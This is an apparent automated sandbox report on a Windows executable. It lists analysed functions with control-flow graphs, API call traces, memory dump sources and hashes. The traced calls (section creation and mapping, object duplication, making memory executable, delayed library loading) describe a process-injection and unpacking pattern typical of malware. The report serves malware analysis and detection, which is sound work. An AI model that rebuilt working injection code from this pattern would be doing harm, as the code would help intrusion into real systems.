                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 1546783058-0
                                                                                                          • Opcode ID: 9984b560c3149dd7a735e47dd78e2cd68fd0edf502ba838df985c043765e37bb
                                                                                                          • Instruction ID: 6f0604b32057d325caf3f51fa446859acea35a512505d6c4cf197e41671a197c
                                                                                                          • Opcode Fuzzy Hash: 9984b560c3149dd7a735e47dd78e2cd68fd0edf502ba838df985c043765e37bb
                                                                                                          • Instruction Fuzzy Hash: 8C512BB1900249BFEF209F92CC48FEFBBB8EF85700F144159F911AA2E5E6759941CB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00401528 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 181 401528-401553 call 401186 185 401555 181->185 186 401558-40155d 181->186 185->186 188 401563-401574 186->188 189 401878-401880 186->189 192 401876-401897 188->192 193 40157a-4015a3 188->193 189->186 200 4018a6 192->200 201 40189d-4018c6 call 401186 192->201 193->192 202 4015a9-4015c0 NtDuplicateObject 193->202 200->201 202->192 203 4015c6-4015ea NtCreateSection 202->203 205 401646-40166c NtCreateSection 203->205 206 4015ec-40160d NtMapViewOfSection 203->206 205->192 210 401672-401676 205->210 206->205 209 40160f-40162b NtMapViewOfSection 206->209 209->205 211 40162d-401643 209->211 210->192 212 40167c-40169d NtMapViewOfSection 210->212 211->205 212->192 215 4016a3-4016bf NtMapViewOfSection 212->215 215->192 218 4016c5 call 4016ca 215->218
                                                                                                          APIs
                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 1546783058-0
                                                                                                          • Opcode ID: 2f760a7a6e5d1e8f12fab574b919c9d6b8d73b05a2dd249efc9c4677c5b04d32
                                                                                                          • Instruction ID: af98140ee9de545a9c2869d3359d5e8b3b7d0483e67685bb764150cfa9c8d530
                                                                                                          • Opcode Fuzzy Hash: 2f760a7a6e5d1e8f12fab574b919c9d6b8d73b05a2dd249efc9c4677c5b04d32
                                                                                                          • Instruction Fuzzy Hash: 6E510871900259BFEB209F92CC48FEFBBB8EF85B10F144159F911AA2A5E7719940CB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0040153C Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 220 40153c-401553 call 401186 226 401555 220->226 227 401558-40155d 220->227 226->227 229 401563-401574 227->229 230 401878-401880 227->230 233 401876-401897 229->233 234 40157a-4015a3 229->234 230->227 241 4018a6 233->241 242 40189d-4018c6 call 401186 233->242 234->233 243 4015a9-4015c0 NtDuplicateObject 234->243 241->242 243->233 244 4015c6-4015ea NtCreateSection 243->244 246 401646-40166c NtCreateSection 244->246 247 4015ec-40160d NtMapViewOfSection 244->247 246->233 251 401672-401676 246->251 247->246 250 40160f-40162b NtMapViewOfSection 247->250 250->246 252 40162d-401643 250->252 251->233 253 40167c-40169d NtMapViewOfSection 251->253 252->246 253->233 256 4016a3-4016bf NtMapViewOfSection 253->256 256->233 259 4016c5 call 4016ca 256->259
                                                                                                          APIs
                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 1546783058-0
                                                                                                          • Opcode ID: 3809ac319917b6d3bab6ba358ca8ba8e52c3928ac3e1657726bd27ab975abf26
                                                                                                          • Instruction ID: bcfd12d57f681495948eb5138da1c6a4081ea1a5ed11d5619747b33be395d59e
                                                                                                          • Opcode Fuzzy Hash: 3809ac319917b6d3bab6ba358ca8ba8e52c3928ac3e1657726bd27ab975abf26
                                                                                                          • Instruction Fuzzy Hash: 8C510A71900245BFEB209F92CC48FEFBBB8EF85750F104159F911BA1A5E6749941CB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0258CDE1 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 393 258cde1-258cdfa 394 258cdfc-258cdfe 393->394 395 258ce00 394->395 396 258ce05-258ce11 CreateToolhelp32Snapshot 394->396 395->396 397 258ce21-258ce2e Module32First 396->397 398 258ce13-258ce19 396->398 399 258ce30-258ce31 call 258caa0 397->399 400 258ce37-258ce3f 397->400 398->397 405 258ce1b-258ce1f 398->405 403 258ce36 399->403 403->400 405->394 405->397
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0258CE09
                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 0258CE29
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899774511.0000000002587000.00000040.00000020.00020000.00000000.sdmp, Offset: 02587000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2587000_file.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                          • String ID:
                                                                                                          • API String ID: 3833638111-0
                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                          • Instruction ID: 27dd3e84ebff66d7b64ef5345874d190551d43e64171a4b3506d8a461805ae4a
                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                          • Instruction Fuzzy Hash: 2CF09C326007156BD7257BF5A88CB6F76ECBF45625F100529F543A10C0D7F0E9454675
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00423B30 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 461memorylibraryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 261 423b30-423b6a call 40e8b0 264 423b70-423b76 261->264 265 423b78-423b7c 264->265 266 423b7e-423b84 264->266 265->266 267 423b86-423b8e 266->267 268 423b9a-423ba1 266->268 267->268 270 423b90-423b98 267->270 268->264 271 423ba3-423bad 268->271 270->268 270->271 272 423bb3-423c13 271->272 273 423ca6-423cba 271->273 316 423c16-423c1b 272->316 274 423cc0-423cc6 273->274 275 423cd3-423cda 274->275 276 423cc8-423ccd 274->276 278 423cef-423cf6 275->278 279 423cdc-423cec 275->279 276->275 278->274 281 423cf8-423d1a LocalAlloc 278->281 279->278 283 423d7a-423d7d 281->283 284 423d1c-423d22 281->284 286 423d83-423e23 283->286 287 423e28-423e40 283->287 285 423d28-423d2d 284->285 289 423d51-423d5e call 4238b0 285->289 290 423d2f-423d47 285->290 286->287 292 423e48-423e4b 287->292 305 423d60-423d70 289->305 306 423d75-423d78 289->306 290->289 296 423e78-423e7d 292->296 297 423e4d-423e73 292->297 299 423e83-423f88 296->299 300 423f8d-423f91 296->300 297->296 299->300 300->292 307 423f97-423fae 300->307 305->306 306->283 306->285 310 423fb0-423fc3 307->310 333 423fc5-423fcb 310->333 316->316 319 423c1d-423c24 316->319 323 423c30-423c33 319->323 324 423c26 319->324 326 423c43-423c45 323->326 327 423c35-423c41 323->327 324->323 329 423c52-423c5c 326->329 330 423c47-423c4b 326->330 334 423c50 327->334 335 423c5e-423c66 329->335 336 423c8d-423c91 329->336 330->334 338 423fd0-423fda 333->338 334->329 339 423c68 335->339 340 423c6c-423c83 call 40b470 335->340 341 423c93-423c9d 336->341 342 423ca0 336->342 344 423fe0-423fe1 338->344 345 423fdc 338->345 339->340 354 423c85 340->354 355 423c89 340->355 341->342 342->273 344->338 350 423fe3-42400f VirtualProtect call 423ae0 344->350 345->344 359 424011-42401b 350->359 354->355 355->336 361 42402a-424030 359->361 362 42401d-424026 359->362 363 424032 call 423890 361->363 364 424037-42403e 361->364 362->361 363->364 364->359 367 424040-4240c3 LoadLibraryW 364->367 369 42415a-424171 367->369 370 4240c9-424154 367->370 370->369
                                                                                                          APIs
                                                                                                          • LocalAlloc.KERNELBASE(00000000,022826CC,?,?,?,?,?,?,004264D6,000000FF), ref: 00423D00
                                                                                                          • VirtualProtect.KERNELBASE(0044585C,022826CC,00000040,?,?,?,?,?,?,?,004264D6,000000FF), ref: 00423FFE
                                                                                                          • LoadLibraryW.KERNELBASE(02278708,?,?,?,?,?,?,004264D6,000000FF), ref: 004240B3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899461393.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocLibraryLoadLocalProtectVirtual
                                                                                                          • String ID: t^:
                                                                                                          • API String ID: 2324553274-1317908726
                                                                                                          • Opcode ID: 2f6e8738e1bd21b89a99e9e903676fc1c4d7815a6bff1382dd3cd4f2f7249fd3
                                                                                                          • Instruction ID: 53ed1037903d383489416d60ef8bb9d8d58e8adcb2ab3f709d755fd7c33fd46c
                                                                                                          • Opcode Fuzzy Hash: 2f6e8738e1bd21b89a99e9e903676fc1c4d7815a6bff1382dd3cd4f2f7249fd3
                                                                                                          • Instruction Fuzzy Hash: 1BF1F971644340ABE320EFA1ED49F5B77B4EB88B01F40452EF785A71E0D7B89944CB6A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0040DA32 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 406 40da32-40da3c 407 40da59-40da62 406->407 408 40da3e-40da48 406->408 410 40da64 407->410 411 40da65-40da6a 407->411 408->407 409 40da4a-40da58 408->409 410->411 412 40da6c-40da7d RtlAllocateHeap 411->412 413 40da7f-40da86 411->413 412->413 414 40dab1-40dab3 412->414 415 40daa4-40daa9 413->415 416 40da88-40da91 call 40907e 413->416 415->414 419 40daab 415->419 416->411 421 40da93-40da98 416->421 419->414 422 40daa0-40daa2 421->422 423 40da9a 421->423 422->414 423->422
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0040ADF9,?,?,00000000), ref: 0040DA75
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899461393.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: e497a4a9dd89ed2a6d64911c88cc1a1e829b5dfae084f140ca0cdee55dcbb27e
                                                                                                          • Instruction ID: 3538c249809fad65a19d3fc31e948527158e10f5b837de61f7a0b7f97e5c81a4
                                                                                                          • Opcode Fuzzy Hash: e497a4a9dd89ed2a6d64911c88cc1a1e829b5dfae084f140ca0cdee55dcbb27e
                                                                                                          • Instruction Fuzzy Hash: 3701B131B092159BEB289FA5CC14B673394AF81760F04463AA806EB2E0D77C9C04CE88
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0040A928 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 424 40a928-40a937 426 40a939-40a93c 424->426 427 40a93d-40a940 424->427 428 40a952-40a95a call 40ad9e 427->428 429 40a942-40a948 427->429 432 40a95f-40a964 428->432 429->429 431 40a94a-40a950 429->431 431->428 431->429 433 40a973-40a97e call 40b470 432->433 434 40a966-40a972 432->434 433->434
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899461393.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __malloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 3464615804-0
                                                                                                          • Opcode ID: bf19376d0f04960d0d954e6c63c8720db25be3dbb312c4520880d50d63a98be5
                                                                                                          • Instruction ID: bf3fae0e5f08207209406d72f62b85fd138407474cce995d875b339fbe823418
                                                                                                          • Opcode Fuzzy Hash: bf19376d0f04960d0d954e6c63c8720db25be3dbb312c4520880d50d63a98be5
                                                                                                          • Instruction Fuzzy Hash: 6DF0E9B76002106ACB357B34BC45C9B2728DED536530B4837F401E3391F63C8E5183AA
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004018C9 Relevance: 1.3, APIs: 1, Instructions: 64sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 438 4018c9-40192e call 401186 Sleep call 4013fb 452 401930-401938 call 4014f4 438->452 453 40193d-401986 call 401186 438->453 452->453
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                                                            • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                            • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4152845823-0
                                                                                                          • Opcode ID: 53c9cd3384d2906c802fe6f3e3e31b8b704e5f86a1bc45d71cf18f0f00b039c7
                                                                                                          • Instruction ID: e62ef0a5377d8aa3a211eebfa9e1192b8d220afb4109f2d02ab252a4e2d2aae2
                                                                                                          • Opcode Fuzzy Hash: 53c9cd3384d2906c802fe6f3e3e31b8b704e5f86a1bc45d71cf18f0f00b039c7
                                                                                                          • Instruction Fuzzy Hash: CA118EB220C305FADB006A949C91EBA36689B11714F308137BB53790F1A57C9653F76F
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004018E5 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 467 4018e5-40192e call 401186 Sleep call 4013fb 481 401930-401938 call 4014f4 467->481 482 40193d-401986 call 401186 467->482 481->482
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                                                            • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                            • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4152845823-0
                                                                                                          • Opcode ID: 4ed9d038ad82778c0538dd9e301f09955b0ecda2ba93e19649321b1be2ae3255
                                                                                                          • Instruction ID: 05c04d2ad09f16b9b87c287c864bc9b7ec61e89fae5dcaecab9d0654b7c4e063
                                                                                                          • Opcode Fuzzy Hash: 4ed9d038ad82778c0538dd9e301f09955b0ecda2ba93e19649321b1be2ae3255
                                                                                                          • Instruction Fuzzy Hash: BB015BB220C305EADB006A949D62EB932649B15715F308137BA53790F1957C8653F61B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004018D4 Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 496 4018d4-40192e call 401186 Sleep call 4013fb 508 401930-401938 call 4014f4 496->508 509 40193d-401986 call 401186 496->509 508->509
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                                                            • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                            • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4152845823-0
                                                                                                          • Opcode ID: 6bef9fa10c94b4d929980f6de66e1a6c4508e267192d79ae07afb604da632a6a
                                                                                                          • Instruction ID: fce81954366252da7adbbdf3d64cc03e59f8ef64e68a90b3f3f5323062df9ebf
                                                                                                          • Opcode Fuzzy Hash: 6bef9fa10c94b4d929980f6de66e1a6c4508e267192d79ae07afb604da632a6a
                                                                                                          • Instruction Fuzzy Hash: FF016DB220C305EADB006A949C61EAA37645B51715F348137BA53B90F1D57C8653F62B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004018F4 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 523 4018f4-40192e call 401186 Sleep call 4013fb 534 401930-401938 call 4014f4 523->534 535 40193d-401986 call 401186 523->535 534->535
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                                                            • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                            • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4152845823-0
                                                                                                          • Opcode ID: 3b2755767c2db92140373cfbb1f56a3cbda9640d3fbd25a37bb45c91bc9b33cf
                                                                                                          • Instruction ID: 61556fbd74693c1122d25878dabab91872ca5c85c54c0931cf2d8ffcbe0fb9f5
                                                                                                          • Opcode Fuzzy Hash: 3b2755767c2db92140373cfbb1f56a3cbda9640d3fbd25a37bb45c91bc9b33cf
                                                                                                          • Instruction Fuzzy Hash: 5A0178B2248306FADB006AA49CA1EB932249B55715F308137FB13B90F1D57C8653F72B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004018E9 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 549 4018e9-40192e call 401186 Sleep call 4013fb 558 401930-401938 call 4014f4 549->558 559 40193d-401986 call 401186 549->559 558->559
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                                                            • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                            • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4152845823-0
                                                                                                          • Opcode ID: 374dd4e1e0cffe5c307a426bb944a598177891720c0ffdd1d7a0e73783737b7f
                                                                                                          • Instruction ID: 0cfdbf57c40ebd16915b75e0bcaa31018d6035999b4c8e4d4561116cd1d9419c
                                                                                                          • Opcode Fuzzy Hash: 374dd4e1e0cffe5c307a426bb944a598177891720c0ffdd1d7a0e73783737b7f
                                                                                                          • Instruction Fuzzy Hash: FA017CB2208305FADB006AA09C61EA937649B55715F30813BFA53780F1957D8653F62B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004018FC Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 573 4018fc-40192e call 401186 Sleep call 4013fb 580 401930-401938 call 4014f4 573->580 581 40193d-401986 call 401186 573->581 580->581
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 3472027048-0
                                                                                                          • Opcode ID: 001f3e1c90e0c9d478250d7b774a10e9bedc05eb8f5a2ddccafa56d5773fc4c0
                                                                                                          • Instruction ID: 8924cd936244c1d255e5b8ad3bd9668b31b5227b00448509fbcd462ac300149e
                                                                                                          • Opcode Fuzzy Hash: 001f3e1c90e0c9d478250d7b774a10e9bedc05eb8f5a2ddccafa56d5773fc4c0
                                                                                                          • Instruction Fuzzy Hash: 9A018FB2208305BBDF006AE08C62EA93B645F15315F244477FA53B91F2D57C9A52E72B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0258CAA0 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0258CAF1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899774511.0000000002587000.00000040.00000020.00020000.00000000.sdmp, Offset: 02587000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2587000_file.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                          • Instruction ID: 526b950d2cd043e3121eff7db7014728a182335d16ec0266d2d7c059d447cbc4
                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                          • Instruction Fuzzy Hash: B4112B79A00208EFDB01DF98C985E98BFF5AF08351F058095F948AB361D771EA50DF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions

                                                                                                          Function 004012AA Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: O$u
                                                                                                          • API String ID: 0-1426094074
                                                                                                          • Opcode ID: 70f08006886caaf092c5829f33f11fb51f64c9d12048d00267c95fac2347aa9f
                                                                                                          • Instruction ID: ec081fa5312fe6fc4e52d732a61ad1849d70c5eb2d1ef5a03c42e236a8c7c1f6
                                                                                                          • Opcode Fuzzy Hash: 70f08006886caaf092c5829f33f11fb51f64c9d12048d00267c95fac2347aa9f
                                                                                                          • Instruction Fuzzy Hash: 60515A71948391EBC712CF25C895AA67FB4FF5232472442FFD991BA1F2C2394102DB5A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004012B4 Relevance: 2.7, Strings: 2, Instructions: 151COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: O$u
                                                                                                          • API String ID: 0-1426094074
                                                                                                          • Opcode ID: 60829e25b52dc9c286bcfc8c1594e64d5fadf153f3335295984f2997cccd9bdc
